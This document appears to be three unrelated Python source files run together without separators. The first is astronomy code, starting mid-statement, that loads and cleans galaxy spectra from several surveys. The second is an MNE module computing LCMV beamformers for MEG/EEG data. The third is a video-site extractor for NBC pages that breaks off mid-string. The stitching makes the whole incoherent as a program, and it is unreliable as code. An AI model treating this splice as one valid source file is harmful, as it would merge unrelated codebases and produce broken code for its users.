self.wavelength[(lines_mask==False)] self.flux = self.flux[(lines_mask==False)] self.error = self.error[(lines_mask==False)] self.bad_flags = self.bad_flags[(lines_mask==False)] self.r_instrument = resolution[(lines_mask==False)] bad_data = np.isnan(self.flux) | np.isinf(self.flux) | (self.flux <= 0.0) | np.isnan(self.error) | np.isinf(self.error) # removes the bad data from the spectrum self.flux[bad_data] = 0.0 self.error[bad_data] = np.max(self.flux) * 99999999999.9 self.bad_flags[bad_data] = 0 self.vdisp = 70. # km/s self.trust_flag = 1 self.objid = 0 if self.milky_way_reddening : # gets the amount of MW reddening on the models self.ebv_mw = get_dust_radec(self.ra,self.dec,'ebv') else: self.ebv_mw = 0.0 print"there are", len(self.wavelength),"data points at redshift",self.redshift," between", np.min(self.wavelength[bad_data==False]), np.max(self.wavelength[bad_data==False]), "Angstrom.", np.min(self.restframe_wavelength[bad_data==False]), np.max(self.restframe_wavelength[bad_data==False]), "Angstrom in the rest frame." def openObservedStackTutorial(self): """ It reads an Stack spectrum from the LF analysis and provides the input for the firefly fitting routine. :param path_to_spectrum: :param sdss_dir: directory with the observed spectra :param milky_way_reddening: True or False if you want to correct the redenning of the Milky way. :param hpf_mode: 'on' high pass filters the data to correct from dust in the galaxy. In this aims, it stores the following data in the object : * hdu list from the spec lite * SED data : wavelength (in angstrom), flux, error on the flux (in 10^{-17} erg/cm2/s/Angstrom, like the SDSS spectra) * Metadata : * ra : in degrees J2000 * dec : in degrees J2000 * redshift : best fit * vdisp : velocity dispersion in km/s * r_instrument : resolution of the instrument at each wavelength observed * trust_flag : 1 or True if trusted * bad_flags : ones as long as the wavelength array, filters the pixels with bad data * objid : object id optional : set to 0 """ self.hdulist = pyfits.open(self.path_to_spectrum) self.ra = 0. #self.hdulist[0].header['RA'] self.dec = 0. #self.hdulist[0].header['DEC'] self.redshift = float(os.path.basename(self.path_to_spectrum).split('-')[-1].split('_')[0][1:]) self.restframe_wavelength = self.hdulist[1].data['WAVE'][0] self.wavelength = self.restframe_wavelength * (1. + self.redshift) meanWL = (self.wavelength[1:]+self.wavelength[:-1])/2. deltaWL = self.wavelength[1:]-self.wavelength[:-1] resolution = np.ones_like(self.wavelength)*np.mean(meanWL / deltaWL) # units of 1e-17 f lambda self.flux = self.hdulist[1].data['FLUXMEDIAN'][0]# * 1e-17 self.error = self.hdulist[1].data['FLUXMEDIAN_ERR'][0]# * 1e-17 self.bad_flags = np.ones(len(self.restframe_wavelength)) Nstacked = float(self.path_to_spectrum.split('-')[-1].split('_')[3]) lines_mask = ((self.restframe_wavelength > 3728 - self.N_angstrom_masked) & (self.restframe_wavelength < 3728 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 5007 - self.N_angstrom_masked) & (self.restframe_wavelength < 5007 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 4861 - self.N_angstrom_masked) & (self.restframe_wavelength < 4861 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 6564 - self.N_angstrom_masked) & (self.restframe_wavelength < 6564 + self.N_angstrom_masked)) self.restframe_wavelength = self.restframe_wavelength[(lines_mask==False)] self.wavelength = self.wavelength[(lines_mask==False)] self.flux = self.flux[(lines_mask==False)] self.error = self.error[(lines_mask==False)] self.bad_flags = self.bad_flags[(lines_mask==False)] self.r_instrument = resolution[(lines_mask==False)] bad_data = np.isnan(self.flux) | np.isinf(self.flux) | (self.flux <= 0.0) | np.isnan(self.error) | np.isinf(self.error) # removes the bad data from the spectrum self.flux[bad_data] = 0.0 self.error[bad_data] = np.max(self.flux) * 99999999999.9 self.bad_flags[bad_data] = 0 self.vdisp = 70. # km/s self.trust_flag = 1 self.objid = 0 if self.milky_way_reddening : # gets the amount of MW reddening on the models self.ebv_mw = get_dust_radec(self.ra,self.dec,'ebv') else: self.ebv_mw = 0.0 print"there are", len(self.wavelength),"data points at redshift",self.redshift," between", np.min(self.wavelength[bad_data==False]), np.max(self.wavelength[bad_data==False]), "Angstrom.", np.min(self.restframe_wavelength[bad_data==False]), np.max(self.restframe_wavelength[bad_data==False]), "Angstrom in the rest frame." def openStackEBOSS(self, redshift = 0.85, fluxKeyword='medianWeightedStack'): self.hdulist = pyfits.open(self.path_to_spectrum) self.ra = 0. #self.hdulist[0].header['RA'] self.dec = 0. #self.hdulist[0].header['DEC'] self.redshift = redshift self.restframe_wavelength = self.hdulist[1].data['wavelength'] self.wavelength = self.restframe_wavelength * (1. + self.redshift) meanWL = (self.wavelength[1:]+self.wavelength[:-1])/2. deltaWL = self.wavelength[1:]-self.wavelength[:-1] resolution = np.ones_like(self.wavelength)*np.mean(meanWL / deltaWL) self.flux = self.hdulist[1].data[fluxKeyword] #* 10**(-17) self.error = self.hdulist[1].data['jackknifStackErrors'] #* 10**(-17) self.bad_flags = np.ones(len(self.restframe_wavelength)) lines_mask = ((self.restframe_wavelength > 3728 - self.N_angstrom_masked) & (self.restframe_wavelength < 3728 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 5007 - self.N_angstrom_masked) & (self.restframe_wavelength < 5007 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 4861 - self.N_angstrom_masked) & (self.restframe_wavelength < 4861 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 6564 - self.N_angstrom_masked) & (self.restframe_wavelength < 6564 + self.N_angstrom_masked)) self.restframe_wavelength = self.restframe_wavelength[(lines_mask==False)] self.wavelength = self.wavelength[(lines_mask==False)] self.flux = self.flux[(lines_mask==False)] self.error = self.error[(lines_mask==False)] self.bad_flags = self.bad_flags[(lines_mask==False)] self.r_instrument = resolution[(lines_mask==False)] bad_data = np.isnan(self.flux) | np.isinf(self.flux) | (self.flux <= 0.0) | np.isnan(self.error) | np.isinf(self.error) # removes the bad data from the spectrum self.flux[bad_data] = 0.0 self.error[bad_data] = np.max(self.flux) * 99999999999.9 self.bad_flags[bad_data] = 0 self.vdisp = 70. # km/s self.trust_flag = 1 self.objid = 0 if self.milky_way_reddening : # gets the amount of MW reddening on the models self.ebv_mw = get_dust_radec(self.ra,self.dec,'ebv') else: self.ebv_mw = 0.0 print"there are", len(self.wavelength),"data points at redshift",self.redshift," between", np.min(self.wavelength[bad_data==False]), np.max(self.wavelength[bad_data==False]), "Angstrom.", np.min(self.restframe_wavelength[bad_data==False]), np.max(self.restframe_wavelength[bad_data==False]), "Angstrom in the rest frame." def openObservedVVDSpectrum(self, catalog_entry, survey='vvds'): """ It reads a VVDS spectrum and provides the input for the firefly fitting routine. """ self.hdulist = pyfits.open(glob.glob(os.path.join(os.environ['VVDS_DIR'], 'spectra',"sc_*" + str(catalog_entry['NUM']) + "*atm_clean.fits"))[0]) wl=self.hdulist[0].header['CRVAL1'] + self.hdulist[0].header['CDELT1'] * np.arange(2,self.hdulist[0].header['NAXIS1']+2) fl=self.hdulist[0].data[0] correctionAperture = 1. / catalog_entry['fo'] noiseFileName=glob.glob(glob.glob(os.path.join(os.environ['VVDS_DIR'], 'spectra', "sc_*"+str(catalog_entry['NUM'])+"*noise.fits"))[0])[0] noiseHDU=pyfits.open(noiseFileName) flErr=noiseHDU[0].data[0] self.wavelength,self.flux,self.error=wl, fl*correctionAperture * 1e17, flErr*correctionAperture * 1e17 self.ra = catalog_entry['ALPHA'] self.dec = catalog_entry['DELTA'] self.bad_flags = np.ones(len(self.wavelength)) self.redshift = catalog_entry['Z'] self.vdisp = 2000. #catalog_entry['VDISP'] self.restframe_wavelength = self.wavelength / (1.0+self.redshift) self.trust_flag = 1 self.objid = 0 # masking emission lines lines_mask = ((self.restframe_wavelength > 3728 - self.N_angstrom_masked) & (self.restframe_wavelength < 3728 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 5007 - self.N_angstrom_masked) & (self.restframe_wavelength < 5007 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 4861 - self.N_angstrom_masked) & (self.restframe_wavelength < 4861 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 6564 - self.N_angstrom_masked) & (self.restframe_wavelength < 6564 + self.N_angstrom_masked)) self.restframe_wavelength = self.restframe_wavelength[(lines_mask==False)] self.wavelength = self.wavelength[(lines_mask==False)] self.flux = self.flux[(lines_mask==False)] self.error = self.error[(lines_mask==False)] self.bad_flags = self.bad_flags[(lines_mask==False)] bad_data = np.isnan(self.flux) | np.isinf(self.flux) | (self.flux <= 0.0) | np.isnan(self.error) | np.isinf(self.error) # removes the bad data from the spectrum self.flux[bad_data] = 0.0 self.error[bad_data] = np.max(self.flux) * 99999999999.9 self.bad_flags[bad_data] = 0 self.r_instrument = np.zeros(len(self.wavelength)) for wi,w in enumerate(self.wavelength): self.r_instrument[wi] = 220. if self.milky_way_reddening : self.ebv_mw = catalog_entry['EBV_MW'] else: self.ebv_mw = 0.0 def openObservedVIPERSpectrum(self, catalog_entry, survey='vipers'): """ It reads a VVDS spectrum and provides the input for the firefly fitting routine. """ self.field='W'+catalog_entry['id_IAU'][7] specFileName=os.path.join(os.environ['VIPERS_DIR'], 'spectra',"VIPERS_"+ self.field+ "_PDR2_SPECTRA_1D",catalog_entry['id_IAU'][:6]+"_"+catalog_entry['id_IAU'][7:]+".fits") self.hdulist = pyfits.open(specFileName) wlA=self.hdulist[1].data['WAVES'] flA=self.hdulist[1].data['FLUXES'] flErrA=self.hdulist[1].data['NOISE'] mask=self.hdulist[1].data['MASK'] wl, fl, flErr= wlA[(mask==0)], flA[(mask==0)], flErrA[(mask==0)] correctionAperture = 1. / catalog_entry['fo'] self.wavelength,self.flux,self.error=wl, fl*correctionAperture * 1e17, flErr*correctionAperture * 1e17 self.ra = catalog_entry['ALPHA'] self.dec = catalog_entry['DELTA'] self.bad_flags = np.ones(len(self.wavelength)) self.redshift = catalog_entry['zspec'] self.vdisp = 2000. #catalog_entry['VDISP'] self.restframe_wavelength = self.wavelength / (1.0+self.redshift) self.trust_flag = 1 self.objid = 0 # masking emission lines lines_mask = ((self.restframe_wavelength > 3728 - self.N_angstrom_masked) & (self.restframe_wavelength < 3728 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 5007 - self.N_angstrom_masked) & (self.restframe_wavelength < 5007 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 4861 - self.N_angstrom_masked) & (self.restframe_wavelength < 4861 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 6564 - self.N_angstrom_masked) & (self.restframe_wavelength < 6564 + self.N_angstrom_masked)) self.restframe_wavelength = self.restframe_wavelength[(lines_mask==False)] self.wavelength = self.wavelength[(lines_mask==False)] self.flux = self.flux[(lines_mask==False)] self.error = self.error[(lines_mask==False)] self.bad_flags = self.bad_flags[(lines_mask==False)] bad_data = np.isnan(self.flux) | np.isinf(self.flux) | (self.flux <= 0.0) | np.isnan(self.error) | np.isinf(self.error) self.flux[bad_data] = 0.0 self.error[bad_data] = np.max(self.flux) * 99999999999.9 self.bad_flags[bad_data] = 0 self.r_instrument = np.zeros(len(self.wavelength)) for wi,w in enumerate(self.wavelength): self.r_instrument[wi] = 220. if self.milky_way_reddening : self.ebv_mw = catalog_entry['EBV'] else: self.ebv_mw = 0.0 def openObservedDEEP2pectrum(self, catalog_entry, survey='deep2'): """ It reads a VVDS spectrum and provides the input for the firefly fitting routine. """ mask=str(catalog_entry['MASK']) objno=str(catalog_entry['OBJNO']) path_to_spectrum = glob.glob(os.path.join(os.environ['DEEP2_DIR'], 'spectra', mask, '*', '*' + objno + '*_fc_tc.dat'))[0] wl, fl, flErr= np.loadtxt(path_to_spectrum, unpack=True) self.wavelength = wl self.flux, self.error= fl * 1e17, flErr * 1e17 self.ra = catalog_entry['RA'] self.dec = catalog_entry['DEC'] self.bad_flags = np.ones(len(self.wavelength)) self.redshift = catalog_entry['ZBEST'] self.vdisp = 60. #catalog_entry['VDISP'] self.restframe_wavelength = self.wavelength / (1.0+self.redshift) self.trust_flag = 1 self.objid = 0 # masking emission lines lines_mask = ((self.restframe_wavelength > 3728 - self.N_angstrom_masked) & (self.restframe_wavelength < 3728 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 5007 - self.N_angstrom_masked) & (self.restframe_wavelength < 5007 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 4861 - self.N_angstrom_masked) & (self.restframe_wavelength < 4861 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 6564 - self.N_angstrom_masked) & (self.restframe_wavelength < 6564 + self.N_angstrom_masked)) self.restframe_wavelength = self.restframe_wavelength[(lines_mask==False)] self.wavelength = self.wavelength[(lines_mask==False)] self.flux = self.flux[(lines_mask==False)] self.error = self.error[(lines_mask==False)] self.bad_flags = self.bad_flags[(lines_mask==False)] bad_data = np.isnan(self.flux) | np.isinf(self.flux) | (self.flux <= 0.0) | np.isnan(self.error) | np.isinf(self.error) # removes the bad data from the spectrum self.flux[bad_data] = 0.0 self.error[bad_data] = np.max(self.flux) * 99999999999.9 self.bad_flags[bad_data] = 0 self.r_instrument = np.zeros(len(self.wavelength)) for wi,w in enumerate(self.wavelength): self.r_instrument[wi] = 6000. if self.milky_way_reddening : self.ebv_mw = catalog_entry['SFD_EBV'] else: self.ebv_mw = 0.0 def openObservedMuseSpectrum(self, catalog): """Loads an observed MUSE spectrum in counts. :param catalog: name of the catalog with redshifts. """ self.wavelength, flA, flErrA = np.loadtxt(self.path_to_spectrum, unpack=True) self.flux, self.error = flA*1e-3, flErrA*1e-3 # units of 1e-17 self.bad_flags = np.ones(len(self.wavelength)) bad_data = np.isnan(self.flux) | np.isinf(self.flux) | (self.flux <= 0.0) | np.isnan(self.error) | np.isinf(self.error) # removes the bad data from the spectrum self.flux[bad_data] = 0.0 self.error[bad_data] = np.max(self.flux) * 99999999999.9 self.bad_flags[bad_data] = 0 self.redshift = catalog['FINAL_Z'] self.vdisp = 100 # catalog['VDISP'] self.restframe_wavelength = self.wavelength / (1.0+self.redshift) # masking emission lines lines_mask = ((self.restframe_wavelength > 3728 - self.N_angstrom_masked) & (self.restframe_wavelength < 3728 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 5007 - self.N_angstrom_masked) & (self.restframe_wavelength < 5007 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 4861 - self.N_angstrom_masked) & (self.restframe_wavelength < 4861 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 6564 - self.N_angstrom_masked) & (self.restframe_wavelength < 6564 + self.N_angstrom_masked)) self.restframe_wavelength = self.restframe_wavelength[(lines_mask==False)] self.wavelength = self.wavelength[(lines_mask==False)] self.flux = self.flux[(lines_mask==False)] self.error = self.error[(lines_mask==False)] self.bad_flags = self.bad_flags[(lines_mask==False)] self.r_instrument = np.zeros(len(self.wavelength)) for wi,w in enumerate(self.wavelength): if w<6000: self.r_instrument[wi] = (2270.0-1560.0)/(6000.0-3700.0)*w + 420.0 else: self.r_instrument[wi] = (2650.0-1850.0)/(9000.0-6000.0)*w + 250.0 self.trust_flag = 1 self.objid = 0 if self.milky_way_reddening : # gets the amount of MW reddening on the models self.ebv_mw = get_dust_radec(catalog['ALPHA'], catalog['DELTA'], 'ebv') else: self.ebv_mw = 0.
"""Compute Linearly constrained minimum variance (LCMV) beamformer.""" # Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr> # Roman Goj <roman.goj@gmail.com> # Britta Westner <britta.wstnr@gmail.com> # # License: BSD-3-Clause import numpy as np from ..rank import compute_rank from ..io.meas_info import _simplify_info from ..io.pick import pick_channels_cov, pick_info from ..forward import _subject_from_forward from ..minimum_norm.inverse import combine_xyz, _check_reference, _check_depth from ..source_estimate import _make_stc, _get_src_type from ..utils import (logger, verbose, _check_channels_spatial_filter, _check_one_ch_type, _check_info_inv, warn) from ._compute_beamformer import ( _prepare_beamformer_input, _compute_power, _compute_beamformer, _check_src_type, Beamformer, _proj_whiten_data) @verbose def make_lcmv(info, forward, data_cov, reg=0.05, noise_cov=None, label=None, pick_ori=None, rank='info', weight_norm='unit-noise-gain-invariant', reduce_rank=False, depth=None, inversion='matrix', verbose=None): """Compute LCMV spatial filter. Parameters ---------- %(info_not_none)s Specifies the channels to include. Bad channels (in ``info['bads']``) are not used. forward : instance of Forward Forward operator. data_cov : instance of Covariance The data covariance. reg : float The regularization for the whitened data covariance. noise_cov : instance of Covariance The noise covariance. If provided, whitening will be done. Providing a noise covariance is mandatory if you mix sensor types, e.g. gradiometers with magnetometers or EEG with MEG. label : instance of Label Restricts the LCMV solution to a given label. %(pick_ori_bf)s - ``'vector'`` Keeps the currents for each direction separate %(rank_info)s %(weight_norm)s Defaults to ``'unit-noise-gain-invariant'``. %(reduce_rank)s %(depth)s .. versionadded:: 0.18 %(inversion_bf)s .. versionadded:: 0.21 %(verbose)s Returns ------- filters : instance of Beamformer Dictionary containing filter weights from LCMV beamformer. Contains the following keys: 'kind' : str The type of beamformer, in this case 'LCMV'. 'weights' : array The filter weights of the beamformer. 'data_cov' : instance of Covariance The data covariance matrix used to compute the beamformer. 'noise_cov' : instance of Covariance | None The noise covariance matrix used to compute the beamformer. 'whitener' : None | ndarray, shape (n_channels, n_channels) Whitening matrix, provided if whitening was applied to the covariance matrix and leadfield during computation of the beamformer weights. 'weight_norm' : str | None Type of weight normalization used to compute the filter weights. 'pick-ori' : None | 'max-power' | 'normal' | 'vector' The orientation in which the beamformer filters were computed. 'ch_names' : list of str Channels used to compute the beamformer. 'proj' : array Projections used to compute the beamformer. 'is_ssp' : bool If True, projections were applied prior to filter computation. 'vertices' : list Vertices for which the filter weights were computed. 'is_free_ori' : bool If True, the filter was computed with free source orientation. 'n_sources' : int Number of source location for which the filter weight were computed. 'src_type' : str Type of source space. 'source_nn' : ndarray, shape (n_sources, 3) For each source location, the surface normal. 'proj' : ndarray, shape (n_channels, n_channels) Projections used to compute the beamformer. 'subject' : str The subject ID. 'rank' : int The rank of the data covariance matrix used to compute the beamformer weights. 'max-power-ori' : ndarray, shape (n_sources, 3) | None When pick_ori='max-power', this fields contains the estimated direction of maximum power at each source location. 'inversion' : 'single' | 'matrix' Whether the spatial filters were computed for each dipole separately or jointly for all dipoles at each vertex using a matrix inversion. Notes ----- The original reference is :footcite:`VanVeenEtAl1997`. To obtain the Sekihara unit-noise-gain vector beamformer, you should use ``weight_norm='unit-noise-gain', pick_ori='vector'`` followed by :meth:`vec_stc.project('pca', src) <mne.VectorSourceEstimate.project>`. .. versionchanged:: 0.21 The computations were extensively reworked, and the default for ``weight_norm`` was set to ``'unit-noise-gain-invariant'``. References ---------- .. footbibliography:: """ # check number of sensor types present in the data and ensure a noise cov info = _simplify_info(info) noise_cov, _, allow_mismatch = _check_one_ch_type( 'lcmv', info, forward, data_cov, noise_cov) # XXX we need this extra picking step (can't just rely on minimum norm's # because there can be a mismatch. Should probably add an extra arg to # _prepare_beamformer_input at some point (later) picks = _check_info_inv(info, forward, data_cov, noise_cov) info = pick_info(info, picks) data_rank = compute_rank(data_cov, rank=rank, info=info) noise_rank = compute_rank(noise_cov, rank=rank, info=info) for key in data_rank: if (key not in noise_rank or data_rank[key] != noise_rank[key]) and \ not allow_mismatch: raise ValueError('%s data rank (%s) did not match the noise ' 'rank (%s)' % (key, data_rank[key], noise_rank.get(key, None))) del noise_rank rank = data_rank logger.info('Making LCMV beamformer with rank %s' % (rank,)) del data_rank depth = _check_depth(depth, 'depth_sparse') if inversion == 'single': depth['combine_xyz'] = False is_free_ori, info, proj, vertno, G, whitener, nn, orient_std = \ _prepare_beamformer_input( info, forward, label, pick_ori, noise_cov=noise_cov, rank=rank, pca=False, **depth) ch_names = list(info['ch_names']) data_cov = pick_channels_cov(data_cov, include=ch_names) Cm = data_cov._get_square() if 'estimator' in data_cov: del data_cov['estimator'] rank_int = sum(rank.values()) del rank # compute spatial filter n_orient = 3 if is_free_ori else 1 W, max_power_ori = _compute_beamformer( G, Cm, reg, n_orient, weight_norm, pick_ori, reduce_rank, rank_int, inversion=inversion, nn=nn, orient_std=orient_std, whitener=whitener) # get src type to store with filters for _make_stc src_type = _get_src_type(forward['src'], vertno) # get subject to store with filters subject_from = _subject_from_forward(forward) # Is the computed beamformer a scalar or vector beamformer? is_free_ori = is_free_ori if pick_ori in [None, 'vector'] else False is_ssp = bool(info['projs']) filters = Beamformer( kind='LCMV', weights=W, data_cov=data_cov, noise_cov=noise_cov, whitener=whitener, weight_norm=weight_norm, pick_ori=pick_ori, ch_names=ch_names, proj=proj, is_ssp=is_ssp, vertices=vertno, is_free_ori=is_free_ori, n_sources=forward['nsource'], src_type=src_type, source_nn=forward['source_nn'].copy(), subject=subject_from, rank=rank_int, max_power_ori=max_power_ori, inversion=inversion) return filters def _apply_lcmv(data, filters, info, tmin): """Apply LCMV spatial filter to data for source reconstruction.""" if isinstance(data, np.ndarray) and data.ndim == 2: data = [data] return_single = True else: return_single = False W = filters['weights'] for i, M in enumerate(data): if len(M) != len(filters['ch_names']): raise ValueError('data and picks must have the same length') if not return_single: logger.info("Processing epoch : %d" % (i + 1)) M = _proj_whiten_data(M, info['projs'], filters) # project to source space using beamformer weights vector = False if filters['is_free_ori']: sol = np.dot(W, M) if filters['pick_ori'] == 'vector': vector = True else: logger.info('combining the current components...') sol = combine_xyz(sol) else: # Linear inverse: do computation here or delayed if (M.shape[0] < W.shape[0] and filters['pick_ori'] != 'max-power'): sol = (W, M) else: sol = np.dot(W, M) tstep = 1.0 / info['sfreq'] # compatibility with 0.16, add src_type as None if not present: filters, warn_text = _check_src_type(filters) yield _make_stc(sol, vertices=filters['vertices'], tmin=tmin, tstep=tstep, subject=filters['subject'], vector=vector, source_nn=filters['source_nn'], src_type=filters['src_type'], warn_text=warn_text) logger.info('[done]') def _deprecate_max_ori_out(max_ori_out): if max_ori_out is not None: warn('max_ori_out will be removed in 1.0, do not pass it as an ' 'argument', DeprecationWarning) @verbose def apply_lcmv(evoked, filters, *, max_ori_out=None, verbose=None): """Apply Linearly Constrained Minimum Variance (LCMV) beamformer weights. Apply Linearly Constrained Minimum Variance (LCMV) beamformer weights on evoked data. Parameters ---------- evoked : Evoked Evoked data to invert. filters : instance of Beamformer LCMV spatial filter (beamformer weights). Filter weights returned from :func:`make_lcmv`. %(max_ori_out_deprecated)s %(verbose)s Returns ------- stc : SourceEstimate | VolSourceEstimate | VectorSourceEstimate Source time courses. See Also -------- make_lcmv, apply_lcmv_raw, apply_lcmv_epochs, apply_lcmv_cov Notes ----- .. versionadded:: 0.18 """ _check_reference(evoked) _deprecate_max_ori_out(max_ori_out) info = evoked.info data = evoked.data tmin = evoked.times[0] sel = _check_channels_spatial_filter(evoked.ch_names, filters) data = data[sel] stc = _apply_lcmv(data=data, filters=filters, info=info, tmin=tmin) return next(stc) @verbose def apply_lcmv_epochs(epochs, filters, *, max_ori_out=None, return_generator=False, verbose=None): """Apply Linearly Constrained Minimum Variance (LCMV) beamformer weights. Apply Linearly Constrained Minimum Variance (LCMV) beamformer weights on single trial data. Parameters ---------- epochs : Epochs Single trial epochs. filters : instance of Beamformer LCMV spatial filter (beamformer weights) Filter weights returned from :func:`make_lcmv`. %(max_ori_out_deprecated)s return_generator : bool Return a generator object instead of a list. This allows iterating over the stcs without having to keep them all in memory. %(verbose)s Returns ------- stc: list | generator of (SourceEstimate | VolSourceEstimate) The source estimates for all epochs. See Also -------- make_lcmv, apply_lcmv_raw, apply_lcmv, apply_lcmv_cov """ _check_reference(epochs) _deprecate_max_ori_out(max_ori_out) info = epochs.info tmin = epochs.times[0] sel = _check_channels_spatial_filter(epochs.ch_names, filters) data = epochs.get_data()[:, sel, :] stcs = _apply_lcmv(data=data, filters=filters, info=info, tmin=tmin) if not return_generator: stcs = [s for s in stcs] return stcs @verbose def apply_lcmv_raw(raw, filters, start=None, stop=None, *, max_ori_out=None, verbose=None): """Apply Linearly Constrained Minimum Variance (LCMV) beamformer weights. Apply Linearly Constrained Minimum Variance (LCMV) beamformer weights on raw data. Parameters ---------- raw : mne.io.Raw Raw data to invert. filters : instance of Beamformer LCMV spatial filter (beamformer weights). Filter weights returned from :func:`make_lcmv`. start : int Index of first time sample (index not time is seconds). stop : int Index of first time sample not to include (index not time is seconds). %(max_ori_out_deprecated)s %(verbose)s Returns ------- stc : SourceEstimate | VolSourceEstimate Source time courses. See Also -------- make_lcmv, apply_lcmv_epochs, apply_lcmv, apply_lcmv_cov """ _check_reference(raw) _deprecate_max_ori_out(max_ori_out) info = raw.info sel = _check_channels_spatial_filter(raw.ch_names, filters) data, times = raw[sel, start:stop] tmin = times[0] stc = _apply_lcmv(data=data, filters=filters, info=info, tmin=tmin) return next(stc) @verbose def apply_lcmv_cov(data_cov, filters, verbose=None): """Apply Linearly Constrained Minimum Variance (LCMV) beamformer weights. Apply Linearly Constrained Minimum Variance (LCMV) beamformer weights to a data covariance matrix to estimate source power. Parameters ---------- data_cov : instance of Covariance Data covariance matrix. filters : instance of Beamformer LCMV spatial filter (beamformer weights). Filter weights returned from :func:`make_lcmv`. %(verbose)s Returns ------- stc : SourceEstimate | VolSourceEstimate Source power. See Also -------- make_lcmv, apply_lcmv, apply_lcmv_epochs, apply_lcmv_raw """ sel = _check_channels_spatial_filter(data_cov.ch_names, filters) sel_names = [data_cov.ch_names[ii] for ii in sel] data_cov = pick_channels_cov(data_cov, sel_names) n_orient = filters['weights'].shape[0] // filters['n_sources'] # Need to project and whiten along both dimensions data = _proj_whiten_data(data_cov['data'].T, data_cov['projs'], filters) data = _proj_whiten_data(data.T, data_cov['projs'], filters) del data_cov source_power = _compute_power(data, filters['weights'], n_orient) # compatibility with 0.16, add src_type as None if not present: filters, warn_text = _check_src_type(filters) return(_make_stc(source_power, vertices=filters['vertices'], src_type=filters['src_type'], tmin=0., tstep=1., subject=filters['subject'], source_nn=filters['source_nn'], warn_text=warn_text))
from __future__ import unicode_literals import re from .common import InfoExtractor from .theplatform import ThePlatformIE from ..utils import ( find_xpath_attr, lowercase_escape, smuggle_url, unescapeHTML, ) class NBCIE(InfoExtractor): _VALID_URL = r'https?://www\.nbc\.com/(?:[^/]+/)+(?P<id>n?\d+)' _TESTS = [ { 'url': 'http://www.nbc.com/the-tonight-show/segments/112966', 'info_dict': { 'id': '112966', 'ext': 'mp4', 'title': 'Jimmy Fallon Surprises Fans at Ben & Jerry\'s', 'description': 'Jimmy gives out free scoops of his new "Tonight Dough" ice cream flavor by surprising customers at the Ben & Jerry\'s scoop shop.', 'timestamp': 1424246400, 'upload_date': '20150218', 'uploader': 'NBCU-COM', }, 'params': { # m3u8 download 'skip_download': True, }, }, { 'url': 'http://www.nbc.com/the-tonight-show/episodes/176', 'info_dict': { 'id': '176', 'ext': 'flv', 'title': 'Ricky Gervais, Steven Van Zandt, ILoveMakonnen', 'description': 'A brand new episode of The Tonight Show welcomes Ricky Gervais, Steven Van Zandt and ILoveMakonnen.', }, 'skip': '404 Not Found', }, { 'url': 'http://www.nbc.com/saturday-night-live/video/star-wars-teaser/2832821', 'info_dict': { 'id': '2832821', 'ext': 'mp4', 'title': 'Star Wars Teaser', 'description': 'md5:0b40f9cbde5b671a7ff62fceccc4f442', 'timestamp': 1417852800, 'upload_date': '20141206', 'uploader': 'NBCU-COM', }, 'params': { # m3u8 download 'skip_download': True, }, 'skip': 'Only works from US', }, { # This video has expired but with an escaped embedURL 'url': 'http://www.nbc.com/parenthood/episode-guide/season-5/just-like-at-home/515', 'only_matching': True, }, { # HLS streams requires the 'hdnea3' cookie 'url': 'http://www.nbc.com/Kings/video/goliath/n1806', 'info_dict': { 'id': 'n1806', 'ext': 'mp4', 'title': 'Goliath', 'description': 'When an unknown soldier saves the life of the King\'s son in battle, he\'s thrust into the limelight and politics of the kingdom.', 'timestamp': 1237100400, 'upload_date': '20090315', 'uploader': 'NBCU-COM', }, 'params': { 'skip_download': True, }, 'skip': 'Only works from US', } ] def _real_extract(self, url): video_id = self._match_id(url) webpage = self._download_webpage(url, video_id) theplatform_url = unescapeHTML(lowercase_escape(self._html_search_regex( [ r'(?:class="video-player video-player-full" data-mpx-url|class="player" src)="(.*?)"', r'<iframe[^>]+src="((?:https?:)?//player\.theplatform\.com/[^"]+)"', r'"embedURL"\s*:\s*"([^"]+)"' ], webpage, 'theplatform url').replace('_no_endcard', '').replace('\\/', '/'))) if theplatform_url.startswith('//'): theplatform_url = 'http:' + theplatform_url return { '_type': 'url_transparent', 'ie_key': 'ThePlatform', 'url': smuggle_url(theplatform_url, {'source_url': url}), 'id': video_id, } class NBCSportsVPlayerIE(InfoExtractor): _VALID_URL = r'https?://vplayer\.nbcsports\.com/(?:[^/]+/)+(?P<id>[0-9a-zA-Z_]+)' _TESTS = [{ 'url': 'https://vplayer.nbcsports.com/p/BxmELC/nbcsports_share/select/9CsDKds0kvHI', 'info_dict': { 'id': '9CsDKds0kvHI', 'ext': 'flv', 'description': 'md5:df390f70a9ba7c95ff1daace988f0d8d', 'title': 'Tyler Kalinoski hits buzzer-beater to lift Davidson', 'timestamp': 1426270238, 'upload_date': '20150313', 'uploader': 'NBCU-SPORTS', } }, { 'url': 'http://vplayer.nbcsports.com/p/BxmELC/nbc_embedshare/select/_hqLjQ95yx8Z', 'only_matching': True, }] @staticmethod def _extract_url(webpage): iframe_m = re.search( r'<iframe[^>]+src="(?P<url>https?://vplayer\.nbcsports\.com/[^"]+)"', webpage) if iframe_m: return iframe_m.group('url') def _real_extract(self, url): video_id = self._match_id(url) webpage = self._download_webpage(url, video_id) theplatform_url = self._og_search_video_url(webpage) return self.url_result(theplatform_url, 'ThePlatform') class NBCSportsIE(InfoExtractor): # Does not include https because its certificate is invalid _VALID_URL = r'https?://www\.nbcsports\.com//?(?:[^/]+/)+(?P<id>[0-9a-z-]+)' _TEST = { 'url': 'http://www.nbcsports.com//college-basketball/ncaab/tom-izzo-michigan-st-has-so-much-respect-duke', 'info_dict': { 'id': 'PHJSaFWbrTY9', 'ext': 'flv', 'title': 'Tom Izzo, Michigan St. has \'so much 